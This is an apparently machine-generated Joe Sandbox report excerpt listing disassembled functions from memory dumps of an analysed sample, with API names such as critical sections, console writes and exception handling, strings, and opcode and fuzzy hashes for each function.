                                                                              • Snapshot File: hcaresult_4_2_7ffe1a520000_0b1G0H.jbxd
                                                                              Similarity
                                                                              • API ID: CallEncodePointerTranslator
                                                                              • String ID: MOC$RCC
                                                                              • API String ID: 3544855599-2084237596
                                                                              • Opcode ID: 05e6bcd6379202f9de8a504331af606c6f0c7846a7ada8f8d1f8410d364d1b1d
                                                                              • Instruction ID: ffcca90f640834148d3541766e995ce8c5da73cc4b2343276bf36ea4c3c6ba69
                                                                              • Opcode Fuzzy Hash: 05e6bcd6379202f9de8a504331af606c6f0c7846a7ada8f8d1f8410d364d1b1d
                                                                              • Instruction Fuzzy Hash: E0916E72B18B81CAE7108BB6D4402BD7BA1FB46BA8F1441ABEA4D17765DF3CE195C700
                                                                              Function 00007FFE1A523A38 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 154COMMONLIBRARYCODE
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.2146081341.00007FFE1A521000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFE1A520000, based on PE: true
                                                                              • Associated: 00000004.00000002.2146068662.00007FFE1A520000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                              • Associated: 00000004.00000002.2146098149.00007FFE1A532000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                              • Associated: 00000004.00000002.2146117176.00007FFE1A53D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                              • Associated: 00000004.00000002.2146133513.00007FFE1A53F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_7ffe1a520000_0b1G0H.jbxd
                                                                              Similarity
                                                                              • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                                              • String ID: csm
                                                                              • API String ID: 2395640692-1018135373
                                                                              • Opcode ID: 600c049ef3683cbbf08a5c5522dfbe353e9582842af90703f029184ead156da5
                                                                              • Instruction ID: b9cd2e92a5e1a60a3163dd050c15a0a1a7dc487f00fe6c595219cf29cf3162b9
                                                                              • Opcode Fuzzy Hash: 600c049ef3683cbbf08a5c5522dfbe353e9582842af90703f029184ead156da5
                                                                              • Instruction Fuzzy Hash: 81518032B1DA42CADB148F56E444A787392EB85FB4F1081B7DA4A477AADF7DE841C700
                                                                              Function 00007FFE1A5259C8 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 146COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.2146081341.00007FFE1A521000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFE1A520000, based on PE: true
                                                                              • Associated: 00000004.00000002.2146068662.00007FFE1A520000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                              • Associated: 00000004.00000002.2146098149.00007FFE1A532000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                              • Associated: 00000004.00000002.2146117176.00007FFE1A53D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                              • Associated: 00000004.00000002.2146133513.00007FFE1A53F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_7ffe1a520000_0b1G0H.jbxd
                                                                              Similarity
                                                                              • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                                              • String ID: csm$csm
                                                                              • API String ID: 3896166516-3733052814
                                                                              • Opcode ID: e758ec8c21499b3e432f6d95c1f73bf76a1a56d3c0875a2448db4a431929008f
                                                                              • Instruction ID: f4969ed6435158634b47bbcc1cdcd194255c3f9de375a5e8e5156f26392d4e04
                                                                              • Opcode Fuzzy Hash: e758ec8c21499b3e432f6d95c1f73bf76a1a56d3c0875a2448db4a431929008f
                                                                              • Instruction Fuzzy Hash: 7151723270CA42C6EB648BA294442787692EB56FA9F1441F7DA4F477A5CF3CE451C700
                                                                              Function 00007FFE1A5251D8 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 146COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.2146081341.00007FFE1A521000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFE1A520000, based on PE: true
                                                                              • Associated: 00000004.00000002.2146068662.00007FFE1A520000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                              • Associated: 00000004.00000002.2146098149.00007FFE1A532000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                              • Associated: 00000004.00000002.2146117176.00007FFE1A53D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                              • Associated: 00000004.00000002.2146133513.00007FFE1A53F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_7ffe1a520000_0b1G0H.jbxd
                                                                              Similarity
                                                                              • API ID: CallEncodePointerTranslator
                                                                              • String ID: MOC$RCC
                                                                              • API String ID: 3544855599-2084237596
                                                                              • Opcode ID: 5cda7244b452661d0672782f382aa0b3873e73ebf845244b9e3a73cca65a7280
                                                                              • Instruction ID: c52db1b91b8f3a4470f8a0d10ec7fc15a6275f337fd55c7a4f42cf7d1ba2be7c
                                                                              • Opcode Fuzzy Hash: 5cda7244b452661d0672782f382aa0b3873e73ebf845244b9e3a73cca65a7280
                                                                              • Instruction Fuzzy Hash: E3617232A0CB85C1D7208B66E4403B9B7A1FB96BA8F544267EB9D07B65CF7CD190CB00
                                                                              Function 000000014000EDC0 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 57libraryloaderCOMMONLIBRARYCODE
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.2145995795.0000000140001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000140000000, based on PE: true
                                                                              • Associated: 00000004.00000002.2145977337.0000000140000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.2146016749.0000000140014000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.2146033132.000000014001A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.2146050932.000000014001E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_140000000_0b1G0H.jbxd
                                                                              Similarity
                                                                              • API ID: AddressHandleLoadModuleProc
                                                                              • String ID: InitializeCriticalSectionAndSpinCount$kernel32.dll
                                                                              • API String ID: 3055805555-3733552308
                                                                              • Opcode ID: 8c1e87d42adfe8e60614ff850b90a208d486e410194b6671aa5990fefe8541df
                                                                              • Instruction ID: 601bfb796087d826a15eddab62e6da73c6b3e4e45b37998f9684764b2688f2d2
                                                                              • Opcode Fuzzy Hash: 8c1e87d42adfe8e60614ff850b90a208d486e410194b6671aa5990fefe8541df
                                                                              • Instruction Fuzzy Hash: 5C2136B1614B8582EB66DB23F8407DAA3A5B79C7C0F880526BB49577B5EF78C500C700
                                                                              Function 00000001400026F0 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 17COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.2145995795.0000000140001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000140000000, based on PE: true
                                                                              • Associated: 00000004.00000002.2145977337.0000000140000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.2146016749.0000000140014000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.2146033132.000000014001A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.2146050932.000000014001E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_140000000_0b1G0H.jbxd
                                                                              Similarity
                                                                              • API ID: Process$CurrentSizeWorking
                                                                              • String ID: Shrinking process size
                                                                              • API String ID: 2122760700-652428428
                                                                              • Opcode ID: 928bd44cec0a58dd036a38053952d90c466f8539e57cdcef56d3cedc878990dc
                                                                              • Instruction ID: de407452bcc55573093b25e37d4a5c8190b9a80636e05c4b95c6e58ff86151e7
                                                                              • Opcode Fuzzy Hash: 928bd44cec0a58dd036a38053952d90c466f8539e57cdcef56d3cedc878990dc
                                                                              • Instruction Fuzzy Hash: 74E0C9B4601A4191EA029F57A8A03D41260A74CBF0F815721AA290B2F0CE3985858310
                                                                              Function 00000001400030B0 Relevance: 6.3, APIs: 5, Instructions: 76COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.2145995795.0000000140001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000140000000, based on PE: true
                                                                              • Associated: 00000004.00000002.2145977337.0000000140000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.2146016749.0000000140014000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.2146033132.000000014001A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.2146050932.000000014001E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_140000000_0b1G0H.jbxd
                                                                              Similarity
                                                                              • API ID: CriticalSection$Enter$Leave
                                                                              • String ID:
                                                                              • API String ID: 2801635615-0
                                                                              • Opcode ID: 5d43bde81a4cf71b6d13cac54dc418821bc3305084b6f84d33dc9cdc1ff96344
                                                                              • Instruction ID: acd2e58e1a3fd81a861280768b65888603737fa84cc19007189881c9ae716cb0
                                                                              • Opcode Fuzzy Hash: 5d43bde81a4cf71b6d13cac54dc418821bc3305084b6f84d33dc9cdc1ff96344
                                                                              • Instruction Fuzzy Hash: D331137A225A4082EB128F1AF8407D57364F79DBF5F480221FF6A4B7B4DB3AC8858744
                                                                              Function 00007FFE1A52E3F4 Relevance: 6.3, APIs: 4, Instructions: 299fileCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.2146081341.00007FFE1A521000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFE1A520000, based on PE: true
                                                                              • Associated: 00000004.00000002.2146068662.00007FFE1A520000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                              • Associated: 00000004.00000002.2146098149.00007FFE1A532000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                              • Associated: 00000004.00000002.2146117176.00007FFE1A53D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                              • Associated: 00000004.00000002.2146133513.00007FFE1A53F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_7ffe1a520000_0b1G0H.jbxd
                                                                              Similarity
                                                                              • API ID: FileWrite$ConsoleErrorLastOutput
                                                                              • String ID:
                                                                              • API String ID: 2718003287-0
                                                                              • Opcode ID: 0c7799b21e1c94aa1fd225f6b85a6c051f6d6fdfc663a61abe1d9cd11d154d48
                                                                              • Instruction ID: bee4fd993d003d18f1c6dd3d8c6fbc551477dfbc33a1088ce4f82dc279a6f76b
                                                                              • Opcode Fuzzy Hash: 0c7799b21e1c94aa1fd225f6b85a6c051f6d6fdfc663a61abe1d9cd11d154d48
                                                                              • Instruction Fuzzy Hash: D3D1B272B18A81C9E711CFA6D4401FC3BA2FB55BA8B1442B7DE9D57BA5DE38D406C340
                                                                              Function 00007FFE1A52ED1C Relevance: 6.2, APIs: 4, Instructions: 218COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GetConsoleMode.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,00007FFE1A52ED07), ref: 00007FFE1A52EE38
                                                                              • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,00007FFE1A52ED07), ref: 00007FFE1A52EEC3
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.2146081341.00007FFE1A521000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFE1A520000, based on PE: true
                                                                              • Associated: 00000004.00000002.2146068662.00007FFE1A520000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                              • Associated: 00000004.00000002.2146098149.00007FFE1A532000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                              • Associated: 00000004.00000002.2146117176.00007FFE1A53D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                              • Associated: 00000004.00000002.2146133513.00007FFE1A53F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_7ffe1a520000_0b1G0H.jbxd
                                                                              Similarity
                                                                              • API ID: ConsoleErrorLastMode
                                                                              • String ID:
                                                                              • API String ID: 953036326-0
                                                                              • Opcode ID: 011e2ebe13567d8ad8ddad1d699b44402174a3121c3ef3043a650edb943c864e
                                                                              • Instruction ID: 7ee0387a0c45ece6a1fe9668d2e2a8279a391439792228bae72f7d0609b7a7fa
                                                                              • Opcode Fuzzy Hash: 011e2ebe13567d8ad8ddad1d699b44402174a3121c3ef3043a650edb943c864e
                                                                              • Instruction Fuzzy Hash: 1291B2A2B1CE51C5F7508BA694802BD2FA2BB46FA8F1441FBDE0E566A4DF38D446D700
                                                                              Function 0000000140004760 Relevance: 6.1, APIs: 4, Instructions: 70COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • EnterCriticalSection.KERNEL32(?,?,?,0000000140003E7A,?,?,?,?,00000000,00000001400022A6), ref: 0000000140004774
                                                                              • ResetEvent.KERNEL32(?,?,?,0000000140003E7A,?,?,?,?,00000000,00000001400022A6), ref: 0000000140004870
                                                                              • SetEvent.KERNEL32(?,?,?,0000000140003E7A,?,?,?,?,00000000,00000001400022A6), ref: 000000014000487D
                                                                              • LeaveCriticalSection.KERNEL32(?,?,?,0000000140003E7A,?,?,?,?,00000000,00000001400022A6), ref: 000000014000488A
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.2145995795.0000000140001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000140000000, based on PE: true
                                                                              • Associated: 00000004.00000002.2145977337.0000000140000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.2146016749.0000000140014000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.2146033132.000000014001A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.2146050932.000000014001E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_140000000_0b1G0H.jbxd
                                                                              Similarity
                                                                              • API ID: CriticalEventSection$EnterLeaveReset
                                                                              • String ID:
                                                                              • API String ID: 3553466030-0
                                                                              • Opcode ID: c0905a8df1c3b6d7d2917c1fcaa4435d9a1a27abfa891a899b8a9d6119ba031b
                                                                              • Instruction ID: 8df361fa7c869b6ec715234f9c2df2ced8c6baf833446e4218a9444c3b5dacad
                                                                              • Opcode Fuzzy Hash: c0905a8df1c3b6d7d2917c1fcaa4435d9a1a27abfa891a899b8a9d6119ba031b
                                                                              • Instruction Fuzzy Hash: 0F31D1B5614F4881EB42CB57F8803D463A6B79CBD4F984516EB0E8B372EF3AC4958304
                                                                              Function 0000000140004400 Relevance: 6.1, APIs: 4, Instructions: 69COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.2145995795.0000000140001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000140000000, based on PE: true
                                                                              • Associated: 00000004.00000002.2145977337.0000000140000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.2146016749.0000000140014000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.2146033132.000000014001A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.2146050932.000000014001E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_140000000_0b1G0H.jbxd
                                                                              Similarity
                                                                              • API ID: CriticalEventSection$EnterLeaveReset
                                                                              • String ID:
                                                                              • API String ID: 3553466030-0
                                                                              • Opcode ID: 6e550663b123c7b4300ff756dd79b72a11867f34fdb7ecd18ec55ee4b4ab60ba
                                                                              • Instruction ID: 80aeca48758360c6ba791d23c15ba34d7cc547f8c7a26c6fbcbbb07f4ec0a80e
                                                                              • Opcode Fuzzy Hash: 6e550663b123c7b4300ff756dd79b72a11867f34fdb7ecd18ec55ee4b4ab60ba
                                                                              • Instruction Fuzzy Hash: 6F3127B2220A8483D761DF27F48439AB3A0F798BD4F000116EB8A47BB5DF39E491C344
                                                                              Function 00007FFE1A522218 Relevance: 6.0, APIs: 4, Instructions: 39timethreadCOMMONLIBRARYCODE
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.2146081341.00007FFE1A521000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFE1A520000, based on PE: true
                                                                              • Associated: 00000004.00000002.2146068662.00007FFE1A520000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                              • Associated: 00000004.00000002.2146098149.00007FFE1A532000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                              • Associated: 00000004.00000002.2146117176.00007FFE1A53D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                              • Associated: 00000004.00000002.2146133513.00007FFE1A53F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_7ffe1a520000_0b1G0H.jbxd
                                                                              Similarity
                                                                              • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                              • String ID:
                                                                              • API String ID: 2933794660-0
                                                                              • Opcode ID: 540efdc4acb7237d38814a0210c5b4881e051432956c40de0382b68ade111df8
                                                                              • Instruction ID: 5e16ba43ca4e5ac4b218ea7d5970674cb4a5312ae5bb396b86226d0243642682
                                                                              • Opcode Fuzzy Hash: 540efdc4acb7237d38814a0210c5b4881e051432956c40de0382b68ade111df8
                                                                              • Instruction Fuzzy Hash: 7F11EF26B18F0189EB00CB61E8552B833B4FB59B68F441D76DA5D467A4EF78D169C340
                                                                              Function 0000000140013670 Relevance: 6.0, APIs: 4, Instructions: 33COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.2145995795.0000000140001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000140000000, based on PE: true
                                                                              • Associated: 00000004.00000002.2145977337.0000000140000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.2146016749.0000000140014000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.2146033132.000000014001A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.2146050932.000000014001E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_140000000_0b1G0H.jbxd
                                                                              Similarity
                                                                              • API ID: CreateEvent$CriticalInitializeSection
                                                                              • String ID:
                                                                              • API String ID: 926662266-0
                                                                              • Opcode ID: 6e7557a2c0ebfea515044b23bc829654ad5a6134d5329468471647cedafa6715
                                                                              • Instruction ID: 312f8d8d13b8a868d26f937b45fb8075aed367f1a83d8c92d196673213f535ba
                                                                              • Opcode Fuzzy Hash: 6e7557a2c0ebfea515044b23bc829654ad5a6134d5329468471647cedafa6715
                                                                              • Instruction Fuzzy Hash: 8F015A31610F0582E726DFA2B855BCA37E2F75D385F854529FA4A8B630EF3A8145C700
                                                                              Function 00007FFE1A525C00 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 163COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.2146081341.00007FFE1A521000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFE1A520000, based on PE: true
                                                                              • Associated: 00000004.00000002.2146068662.00007FFE1A520000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                              • Associated: 00000004.00000002.2146098149.00007FFE1A532000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                              • Associated: 00000004.00000002.2146117176.00007FFE1A53D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                              • Associated: 00000004.00000002.2146133513.00007FFE1A53F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_7ffe1a520000_0b1G0H.jbxd
                                                                              Similarity
                                                                              • API ID: __except_validate_context_record
                                                                              • String ID: csm$csm
                                                                              • API String ID: 1467352782-3733052814
                                                                              • Opcode ID: 7b854735182fbbf9032f6bb379489979c6e7540e10eb2e5c3fda445f13d9ec39
                                                                              • Instruction ID: 1d6ec58c6fbb430b708a173d99667fbc40a6fa6612764f074da36c68908a55ec
                                                                              • Opcode Fuzzy Hash: 7b854735182fbbf9032f6bb379489979c6e7540e10eb2e5c3fda445f13d9ec39
                                                                              • Instruction Fuzzy Hash: 9071A13260CA81C6E7608B66944477D7BA2EB46FA8F0481F7EE8D47AA9CB2CD551C740
                                                                              Function 00007FFE1A526298 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 120COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.2146081341.00007FFE1A521000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFE1A520000, based on PE: true
                                                                              • Associated: 00000004.00000002.2146068662.00007FFE1A520000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                              • Associated: 00000004.00000002.2146098149.00007FFE1A532000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                              • Associated: 00000004.00000002.2146117176.00007FFE1A53D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                              • Associated: 00000004.00000002.2146133513.00007FFE1A53F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_7ffe1a520000_0b1G0H.jbxd
                                                                              Similarity
                                                                              • API ID: CreateFrameInfo__except_validate_context_record
                                                                              • String ID: csm
                                                                              • API String ID: 2558813199-1018135373
                                                                              • Opcode ID: fdc43af78747129a673bd1320e44d2e2152711131f73500a528a0e9cffec3944
                                                                              • Instruction ID: b7004a15b4d1842242fac45c0df9202b6a9fec25d99e7a016e8db07131ddf7c5
                                                                              • Opcode Fuzzy Hash: fdc43af78747129a673bd1320e44d2e2152711131f73500a528a0e9cffec3944
                                                                              • Instruction Fuzzy Hash: E1514D3671DB41D6D620AF56A08027D77A5FB8AFA0F1005BAEB8D07B66CF38E451CB40
                                                                              Function 00007FFE1A52EA8C Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100fileCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.2146081341.00007FFE1A521000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFE1A520000, based on PE: true
                                                                              • Associated: 00000004.00000002.2146068662.00007FFE1A520000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                              • Associated: 00000004.00000002.2146098149.00007FFE1A532000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                              • Associated: 00000004.00000002.2146117176.00007FFE1A53D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                              • Associated: 00000004.00000002.2146133513.00007FFE1A53F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_7ffe1a520000_0b1G0H.jbxd
                                                                              Similarity
                                                                              • API ID: ErrorFileLastWrite
                                                                              • String ID: U
                                                                              • API String ID: 442123175-4171548499
                                                                              • Opcode ID: 1bda24f103a1684070c02434e8f6c76fd55582b454c16690d6623519bbb42c9a
                                                                              • Instruction ID: 78b8118ca54f4ef92e5c1d15ece2bc99dc9f4cb1bebe61393e0ed2e4875b7def
                                                                              • Opcode Fuzzy Hash: 1bda24f103a1684070c02434e8f6c76fd55582b454c16690d6623519bbb42c9a
                                                                              • Instruction Fuzzy Hash: 4B419162B1DA4185DB20CF66E4443BA67A1FB99BA4F4441B3EE4E877A4EF3CD441CB40
                                                                              Function 0000000140012523 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 69COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.2145995795.0000000140001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000140000000, based on PE: true
                                                                              • Associated: 00000004.00000002.2145977337.0000000140000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.2146016749.0000000140014000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.2146033132.000000014001A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.2146050932.000000014001E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_140000000_0b1G0H.jbxd
                                                                              Similarity
                                                                              • API ID: ExceptionRaise
                                                                              • String ID: csm
                                                                              • API String ID: 3997070919-1018135373
                                                                              • Opcode ID: dba88b77ed38871436108f768fa7b3f2c7bfcf036fc2a4a051b753ac1ce5513b
                                                                              • Instruction ID: 49e9958dea4625aba6399e71a496f31833793ec74c7c4936f150dd50c3eb5df3
                                                                              • Opcode Fuzzy Hash: dba88b77ed38871436108f768fa7b3f2c7bfcf036fc2a4a051b753ac1ce5513b
                                                                              • Instruction Fuzzy Hash: 1D315036204A8082D771CF16E09079EB365F78C7E4F544111EF9A077B5DB3AD892CB41
                                                                              Function 00007FFE1A530910 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 64COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                                • Part of subcall function 00007FFE1A523A38: __except_validate_context_record.LIBVCRUNTIME ref: 00007FFE1A523A63
                                                                              • __GSHandlerCheckCommon.LIBCMT ref: 00007FFE1A530993
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.2146081341.00007FFE1A521000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFE1A520000, based on PE: true
                                                                              • Associated: 00000004.00000002.2146068662.00007FFE1A520000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                              • Associated: 00000004.00000002.2146098149.00007FFE1A532000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                              • Associated: 00000004.00000002.2146117176.00007FFE1A53D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                              • Associated: 00000004.00000002.2146133513.00007FFE1A53F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_7ffe1a520000_0b1G0H.jbxd
                                                                              Similarity
                                                                              • API ID: CheckCommonHandler__except_validate_context_record
                                                                              • String ID: csm$f
                                                                              • API String ID: 1543384424-629598281
                                                                              • Opcode ID: df4735a4e908aa111fba586a5857847e844898d503be1ccfbed92f1abe6d2401
                                                                              • Instruction ID: 921f97f8fe312fb499cd4aaf29b79987da6eb5f9f5e0fdf60b13b98b89ae6791
                                                                              • Opcode Fuzzy Hash: df4735a4e908aa111fba586a5857847e844898d503be1ccfbed92f1abe6d2401
                                                                              • Instruction Fuzzy Hash: CF11B172B18B95C5E7549F63A4411B96764EF86FE4F0880F6EE8907B66CE38D861C700
                                                                              Function 0000000140003620 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 45timeCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.2145995795.0000000140001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000140000000, based on PE: true
                                                                              • Associated: 00000004.00000002.2145977337.0000000140000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.2146016749.0000000140014000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.2146033132.000000014001A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.2146050932.000000014001E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_140000000_0b1G0H.jbxd
                                                                              Similarity
                                                                              • API ID: TimerWaitable
                                                                              • String ID: amps_Set: pHandle=%p, propId=%d, val=%p, vSize=%d
                                                                              • API String ID: 1823812067-484248852
                                                                              • Opcode ID: 590ed17bb6164494f623543e183e49ebce91c212c09f63c64337d20ba62503d7
                                                                              • Instruction ID: 814455377fd743a09d1ce94c7697c2570c7384a68551c8a3e3690f56dccab0e4
                                                                              • Opcode Fuzzy Hash: 590ed17bb6164494f623543e183e49ebce91c212c09f63c64337d20ba62503d7
                                                                              • Instruction Fuzzy Hash: 25114975608B4082EB21CF16B84079AB7A4F79DBD4F544225FF8847B79DB39C5508B40
